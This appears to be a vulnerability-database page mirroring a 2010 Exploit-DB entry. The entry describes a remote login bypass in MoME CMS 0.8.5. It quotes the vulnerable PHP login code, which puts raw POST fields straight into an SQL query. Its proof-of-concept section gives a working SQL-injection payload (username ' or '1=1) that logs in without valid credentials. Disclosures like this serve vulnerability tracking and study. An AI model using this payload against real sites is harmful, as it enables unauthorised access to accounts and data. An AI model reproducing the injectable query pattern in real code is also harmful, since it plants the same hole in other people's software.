MoME CMS 0.8.5 - Remote Authentication Bypass

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1059018 漏洞类型
发布时间 2010-01-16 更新时间 2010-01-16
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/11157
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
\#'#/
                            (-.-)
   --------------------oOO---(_)---OOo-------------------
   |    MoME CMS <= 0.8.5 Remote Login Bypass Exploit   |
   |      (works only with magic_quotes_gpc = off)      |
   ------------------------------------------------------

[!] Discovered: cr4wl3r <cr4wl3r[!]linuxmail.org>
[!] Download: http://sourceforge.net/projects/mome/files/
[!] Date: 16.01.2010
[!] Remote: yes


[!] Code :


//controllo user e passwd da login
 if(isset($_POST['posted_username']) && isset($_POST['posted_password'])) {
        $query="SELECT * FROM users WHERE username='$_POST[posted_username]' AND
password=md5('$_POST[posted_password]')";


[!] PoC:

    username : ' or '1=1
    password : cr4wl3r